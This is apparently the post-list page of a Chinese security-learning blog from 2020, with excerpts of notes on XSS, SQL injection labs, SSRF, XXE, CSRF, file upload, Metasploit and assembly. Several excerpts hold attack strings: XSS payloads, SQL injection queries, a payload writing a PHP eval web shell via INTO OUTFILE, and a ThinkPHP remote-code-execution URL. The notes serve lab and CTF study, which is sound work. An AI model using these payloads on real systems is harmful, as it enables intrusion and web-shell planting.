摘要:![](https://img2020.cnblogs.com/blog/1863787/202005/1863787-20200506195610505-1592405117.png) 阅读全文
posted @ 2020-05-06 20:13 10nnn4R 阅读(113) 评论(0) 推荐(0) 编辑
摘要:https://www.bilibili.com/video/BV1Ft41187ZX php反序列化原理 php序列化与反序列化基础 序列化与反序列化 序列化:将变量转换为可保存或传输的字符串的过程 反序列化:在适当的时候把这个字符串转化为原来的变量使用 php序列化与反序列化函数 seriali 阅读全文
posted @ 2020-05-03 21:16 10nnn4R 阅读(81) 评论(0) 推荐(0) 编辑
摘要:跨域资源共享(CORS)漏洞详解 浏览器同源策略 同协议,同端口同域名 不运行别的网站访问该网站资源 两种跨域方法 JSONP跨域请求 原理 https://www.cnblogs.com/znyu/p/6839617.html jsonp利用script标签具有跨域能力的特点,允许用户通过scri 阅读全文
posted @ 2020-05-03 19:40 10nnn4R 阅读(928) 评论(0) 推荐(0) 编辑
摘要:XXE 概述 XXE也叫做XML外部实体注入[XML External Entity] , 当XML允许引用外部实体并解析时,会导致攻击者构造恶意实体的payloadj进行攻注入攻击,导致攻击者可以读取任意文件、执行命令、攻击网站、以及进行SSRF攻击等 ## XML基础 XML声明: < ?xml 阅读全文
posted @ 2020-05-03 17:41 10nnn4R 阅读(91) 评论(0) 推荐(0) 编辑
摘要:可能出现的场景 远程图片下载 DZ 3.2 加载远程文件 离线下载 百度网盘 迅雷 远程头像 网页翻译 服务器可以发起请求的地方 常见过滤与绕过 正则过滤指定网址(url必须有bugbank) http用户名绕过: www.bugbank@baidu.com 多级域名:www.bugbank.com 阅读全文
posted @ 2020-05-03 16:37 10nnn4R 阅读(78) 评论(0) 推荐(0) 编辑
摘要:自动化生成poc burpsuite CSRF使用方法 POST Burpsuite生成poc-->js代码提交 JSON劫持攻击 CSRF蠕虫 flash CSRF csrf+xss组合拳 CSRF绕过referer 1.Refere为空条件下 - 利用ftp://,http://,https:/ 阅读全文
posted @ 2020-05-03 15:54 10nnn4R 阅读(85) 评论(0) 推荐(0) 编辑
摘要:粗略的参考以下内容学习了一下,以后再深究... https://xz.aliyun.com/t/7405 http://wiki.0-sec.org/ ssrf概述 风险函数 file_get_contents()、fsockopen()、curl_exec()、fopen()、readfile() 阅读全文
posted @ 2020-05-03 12:19 10nnn4R 阅读(218) 评论(0) 推荐(0) 编辑
摘要:概述 xss分类 反射型 :url里面 存储型:存到某种介质里面;留言板 dom型:与反射型xss类似.由js插入到页面 修复: HTML 实体编码 使用白名单 根据业务场景对症下药 黑名单 存储型xss 原理 实战 能输入的地方:发帖,评论,个人签名,文章标题 寻找思路:用户能够输入的地方都有可能 阅读全文
posted @ 2020-05-02 20:14 10nnn4R 阅读(219) 评论(0) 推荐(0) 编辑
摘要:方案一 转载于 攻防世界WP https://adworld.xctf.org.cn/task/writeup?type=web&id=5417&number=3&grade=1&page=1 题目链接https://adworld.xctf.org.cn/task/answer?type=web& 阅读全文
posted @ 2020-05-02 20:10 10nnn4R 阅读(589) 评论(0) 推荐(0) 编辑
摘要:http://test.ctf8.com/ level1 借助window.alert()函数完成任务 http://test.ctf8.com/level1.php?name=<script>alert('123')</script> level2 输入框输入test后 Ctrl+g搜索源码中的t 阅读全文
posted @ 2020-05-02 20:09 10nnn4R 阅读(215) 评论(0) 推荐(0) 编辑
摘要:printf函数 printf("%d", num); 汇编代码调用过程: 0071183F mov eax,dword ptr [num] 00711842 push eax 00711843 push offset string "%d" (0717B30h) 00711848 call _pr 阅读全文
posted @ 2020-05-01 16:46 10nnn4R 阅读(106) 评论(0) 推荐(0) 编辑
摘要:概述 学习汇编的意义 开发时调试 逆向时的代码阅读 某些特殊技术的使用(shellcode,壳) 16/32/64汇编的区别 栈的作用: 存储数据 保存寄存器环境 传递参数 lea eax,dword ptr ss:[esp-4] 将 ss:[esp-4] 传入eax(传址) xchg eax,dw 阅读全文
posted @ 2020-05-01 14:48 10nnn4R 阅读(112) 评论(0) 推荐(0) 编辑
摘要:Bypass Mixed Case(混合大小写) <Svg OnLoad=alert(1)> <Script>alert(1)</Script> Unclosed Tags 利用未闭合的标签绕过 Use in HTML injections to avoid filtering based in t 阅读全文
posted @ 2020-04-30 17:34 10nnn4R 阅读(311) 评论(0) 推荐(0) 编辑
摘要:简介 GitHub地址:https://github.com/Tj1ngwe1/upload-labs 有关php文件上传 PHP $_FILES函数详解: (https://www.cnblogs.com/laijinquan/p/8682282.html)https://www.cnblogs. 阅读全文
posted @ 2020-04-29 19:35 10nnn4R 阅读(289) 评论(0) 推荐(0) 编辑
摘要:XSS Cheat Sheet BASICS HTML注入 当输入位于HTML标记的属性值内或标记的外部(下一种情况中描述的标记除外)时使用。如果输入在HTML注释中,则在payload前加上“-->” <svg onload=alert(1)> "><svg onload=alert(1)> HT 阅读全文
posted @ 2020-04-29 19:16 10nnn4R 阅读(126) 评论(0) 推荐(0) 编辑
摘要:第一章 进制、寄存器与汇编指令(汇编与C语言相结合) 3000元 学习汇编能做什么(逆向,游戏安全,加固/脱壳,反病毒,漏洞挖掘等等必备基础) 1.1 计算机的基本构造及其运行原理 1.2 不同进制的书写方法 1.3 为什么计算机要用二进制 1.4 不同进制间如何运算1 1.5 不同进制间如何运算2 阅读全文
posted @ 2020-04-28 20:23 10nnn4R 阅读(112) 评论(0) 推荐(0) 编辑
摘要:方案一:(手机电脑在同一wifi下) 打开burp设置代理 这里的ip为电脑的ip 手机手动设置代理为电脑的ip+8080 导入证书 电脑上下载下证书(http://burp) 传到手机上 阅读全文
posted @ 2020-04-28 18:13 10nnn4R 阅读(196) 评论(0) 推荐(0) 编辑
摘要:1.更新 apt-get update:更新源 apt-get upgrade:更新软件包 apt-get dist-upgrade:升级系统 2. Metasploit基础 2.1专业名词 Auxiliaries(辅助模块) 扫描,嗅探,指纹识别 Exploit(漏洞利用模块) 针对漏洞进行攻击 阅读全文
posted @ 2020-04-28 11:19 10nnn4R 阅读(106) 评论(0) 推荐(0) 编辑
摘要:来自山丘安全实验室 陈毅 https://www.cnblogs.com/sec875/articles/12243725.html linux下载与更新 apt-get update apt-get install metasploit-framework 启动metaspliot postgre 阅读全文
posted @ 2020-04-27 18:17 10nnn4R 阅读(62) 评论(0) 推荐(0) 编辑
摘要:IIS Internet Information Services--windows 解析漏洞 IIS 6.x 基于文件名:该版本默认会将 *.asp;.jpg 此种格式的文件名,当成 Asp 解析,原理是 服务器默认不解析 ; 号及其后面的内容,相当于截断。 基于文件夹名:该版本 默认会将 *.a 阅读全文
posted @ 2020-04-22 10:33 10nnn4R 阅读(64) 评论(0) 推荐(0) 编辑
摘要:本文为转载,原文地址:http://www.2cto.com/article/201307/228165.html IIS WebDAV安全配置 2013-07-16 12:13:00 作者:瞌睡龙收藏 我要投稿 0x00 简介 WebDAV是一种基于 HTTP 1.1协议的通信协议.它扩展了HTT 阅读全文
posted @ 2020-04-21 18:45 10nnn4R 阅读(329) 评论(0) 推荐(0) 编辑
摘要:内容来自: https://ca0y1h.top/ 联合查询注入 使用场景 页面上有显示位 什么是显示位:在一个在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数据展示在页面中,这个展示数据的位置就叫显示位 。 payload ?id=1' order by 数值 --+ ?i 阅读全文
posted @ 2020-04-21 17:23 10nnn4R 阅读(85) 评论(0) 推荐(0) 编辑
摘要:less18 user-agent的注入 源码分析: check_input对name,password进行了过滤 function check_input($value) { if(!empty($value)) { // truncation (see comments) $value = su 阅读全文
posted @ 2020-03-22 14:14 10nnn4R 阅读(143) 评论(0) 推荐(0) 编辑
摘要:less15 试了很多符号,页面根本不显示别的信息,猜测为盲注 可是怎么检测闭合? 万能密码登录 最终试出来’闭合 uname=1’ or 1=1 # 接下来就要工具跑 less16 同上用万能密码试闭合,工具/脚本跑 less-17 原理https://www.cnblogs.com/laoxia 阅读全文
posted @ 2020-03-21 20:16 10nnn4R 阅读(135) 评论(0) 推荐(0) 编辑
摘要:less11 抓包 ’ " 实验发现’构成闭合,存在注入点 less-12 a,b都有注入点,b比较好判断闭合 less13 less14 阅读全文
posted @ 2020-03-19 17:28 10nnn4R 阅读(128) 评论(0) 推荐(0) 编辑
摘要:less-7 https://www.jianshu.com/p/20d1282e6e1d ?id=0’)) union select 1,‘2’,’<?php @eval($_POST["cmd"]);?>’ into outfile ‘D:\phpstudy\WWW\sqli\Less-7\te 阅读全文
posted @ 2020-03-19 17:10 10nnn4R 阅读(68) 评论(0) 推荐(0) 编辑
摘要:less-5 基于报错的注入 基于报错可以爆出当前数据库名等等 id=2’ and extractvalue(1, concat(0x7c,(select user())));-- # ?id=2’ and extractvalue(1, concat(0x7c,(select @@version) 阅读全文
posted @ 2020-03-15 16:26 10nnn4R 阅读(83) 评论(0) 推荐(0) 编辑
摘要:less-1 爆库 id=1222’ union select 1,group_concat(schema_name),database() from information_schema.schemata –+# 爆表 ?id=1222’ union select 1,group_concat(t 阅读全文
posted @ 2020-03-15 15:27 10nnn4R 阅读(71) 评论(0) 推荐(0) 编辑
摘要:闭合条件的探测 数字型注入 burp抓包 分别测试 id=1 and 1=1和id=1 or 1=1 存在漏洞 字符型注入 ’ 报错 探测闭合条件 ’ order by 1# 未报错.构成闭合 同上有两处查询信息 搜索型 xx型 先构造’ xx# 根据报错很容易写出闭合 payload ')unio 阅读全文
posted @ 2020-03-14 17:53 10nnn4R 阅读(95) 评论(0) 推荐(0) 编辑
摘要:手工注入 查询所有数据库名称和表名 ’ union select 1,table_schema,table_name from information_schema.tables# 发现就两个数据库information_schema与news 查询news数据库中的表的名称 ’ union sel 阅读全文
posted @ 2020-03-08 16:23 10nnn4R 阅读(93) 评论(0) 推荐(0) 编辑
摘要:分类: 可分为数字型和字符型 直接查id与查字段的区别 sql检测 数字型: select * from table where id=1 and 1=1不报错 select * from table where id=1 and 1=2 报错 字符型 关键在闭合与SQL语句及注释 select * 阅读全文
posted @ 2020-03-08 15:40 10nnn4R 阅读(52) 评论(0) 推荐(0) 编辑
摘要:payload5.0.24 http:// /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=test.php&vars[1][] 阅读全文
posted @ 2020-03-05 18:36 10nnn4R 阅读(77) 评论(0) 推荐(0) 编辑
摘要:ls 英文原意:list 命令路径: /bin/ls 权限:所有用户 功能:显示目录文件 语法:ls 选项[-ald] [文件或目录] -a all 所有文件 -l long 详细显示文件 -d 查看目录属性 -i 查看id mkdir 创建新目录 mkdir -p [目录名] 创建新目录 -p 递 阅读全文
posted @ 2020-02-28 14:31 10nnn4R 阅读(91) 评论(0) 推荐(0) 编辑
摘要:https://tool.lu/pyc/在线反编译pyc import base64 correct = 'XlNkVmtUI1MgXWBZXCFeKY+AaXNt' flag = base64.b64decode(correct) def decode(message): s = '' for i 阅读全文
posted @ 2020-02-23 12:54 10nnn4R 阅读(134) 评论(0) 推荐(0) 编辑
摘要:堆的调试实验 调试态堆管理策略和常态堆管理策略:前者只使用空表不用块表,不真实 使用调试器加载函数会触发前者 __asm int3 调试最真实的栈 未启用块表的堆区信息 堆区起始位置(假设为0x00520000) 起始位置开始依次是段表索引,虚表索引,空表使用标识和空表索引区 空表索引区的位置是偏移 阅读全文
posted @ 2020-02-22 17:14 10nnn4R 阅读(142) 评论(0) 推荐(0) 编辑
摘要:基本概念 堆块:堆区内存的基本单位 包括两个部分:块首,块身 块首:标识这个堆块自身的信息:如大小,是否被占用等 块身:分配给用户使用的数据区 堆表:一般位于堆区的起始位置,用于索引堆区所有堆块的信息,包括大小,是否被占用等. 占用态的堆块被使用它的程序索引,堆表只索引所有空闲态的堆块. 堆表分为空 阅读全文
posted @ 2020-02-22 16:08 10nnn4R 阅读(107) 评论(0) 推荐(0) 编辑
摘要:PDO project data object 连接到数据库 $db=new PDO("mysql:dbname=database;host=sever","username","password") example: $db=new PDO("mysql:dbname=imdb;host=loca 阅读全文
posted @ 2020-02-19 15:14 10nnn4R 阅读(114) 评论(0) 推荐(0) 编辑
摘要:ISO 应用层 为应用软件提供接口,使应用程序能够使用网络服务。 各种应用程序协议如HTTP(Web),Telnet(远程控制),FTP(文本传输) 表示层 数据的交换格式、数据加密解密、数据的压缩解压缩 数据编码的处理如ASCII,GBK 保证一个系统应用层发出的信息可被另一系统的应用层读出 会话 阅读全文
posted @ 2020-02-18 20:58 10nnn4R 阅读(63) 评论(0) 推荐(0) 编辑
摘要:数据库基础 常见的数据库模型 层次(树状)模型 网状模型 关系模型 关系型数据库 由相互关联的表通过共享属性构建数据的一种方法 一个数据库由若干张表组成 表中的行称为记录,列称为记录的属性 关系型数据库主要通过SQL去定义,管理及查询数据 RDBMS 关系型数据库的管理系统 对数据库进行管理,并能够 阅读全文
posted @ 2020-02-18 15:14 10nnn4R 阅读(113) 评论(0) 推荐(0) 编辑
摘要:基本概念 php.net/函数名:可以查询函数功能 相关环境:xampp 网页文件中在xampp/htdocs 相关使用:https://www.cnblogs.com/fousor/p/9899575.html 语法 print语句 print"content"; print"<pre>text< 阅读全文
posted @ 2020-02-17 21:29 10nnn4R 阅读(89) 评论(0) 推荐(0) 编辑